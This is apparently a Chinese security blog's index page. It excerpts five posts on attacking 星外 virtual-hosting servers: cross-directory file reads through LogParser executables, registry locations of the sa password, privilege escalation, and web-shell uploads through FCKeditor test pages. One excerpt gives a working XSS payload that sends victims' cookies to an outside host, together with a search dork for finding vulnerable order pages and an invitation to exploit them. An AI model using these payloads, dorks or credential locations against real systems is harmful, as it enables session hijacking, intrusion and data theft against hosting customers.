星外虚拟主机跨web目录文件读取技巧

分类:安全 | 2016-11-7 | 撸过 1,656 次
0人扯谈

星外虚拟主机跨目录读取文件漏洞,需要一定条件。

详细说明:

问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:

c:\windows\7i24IISLOG.exe
 
c:\windows\7i24IISLOG2.exe
 
c:\windows\7i24IISLOG3.exe
 
c:\windows\7i24IISLOG4.exe
 
c:\windows\7i24tool.exe
 
c:\windows\rsb.exe

其中的7i24IISLOG.exe其实就是LogParser,LogParser是一[......]

继续阅读

谈对星外主机提权利用

分类:安全 | 2011-12-6 | 撸过 552 次
0人扯谈

T00LS上最近段时间谈了比较多星外提权的方法,最近刚好碰到了站结合些大牛的思路写个过程!目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本!上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限!RegShell读注册表没发现多少利用的东西,但是根据些信息知道是星外

对新手来说在这里很容易陷入困境!
星外sa密码注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 32位M[......]

继续阅读

星外订单提交处过滤不严导致XSS

分类:安全 | 2011-10-8 | 撸过 459 次
0人扯谈

google or baidu 搜索 inurl:user/order.asp?type=虚拟主机

暂时只会XSS偷取cookie
可以加帐号 可以后台挂马 等等等等 自己利用吧。

XXS 偷取cookie代码

<script>document.write('<img src="https://www.webshell.cc/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>

news.asp代码:

<%
msg=Request.ServerVaria[......]

继续阅读

星外目录扫描可写权限辅助工具

分类:安全, 工具 | 2011-09-14 | 撸过 862 次
0人扯谈

星外提权辅助工具提升提权成功率。原理是自动读所有可读的注册表,

并自动找注册表里面存在的路径信息,然后全部echo。结合阿D的那个

ASP目录扫描脚本效果更佳。

图2:

下载:finaly

一次星外虚拟主机的提权

分类:安全 | 2011-08-1 | 撸过 2,104 次
0人扯谈

今天看到个大马多功能防asp木马查杀内部测试版(有后门)看了下.换客网

www.taoyuanbao.com

小小检测了下绝对没啥可利用的。直接旁注几分钟拿下了个shell貌似运气好,随便打开个旁站。

手工输入 fckeditor路径 …。存在…

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

直接上传一句话。aspx的站 … 直接上大马…看了下路径d:\freehost 星外的主机。

在土司找到星外提权“新思路”[......]

继续阅读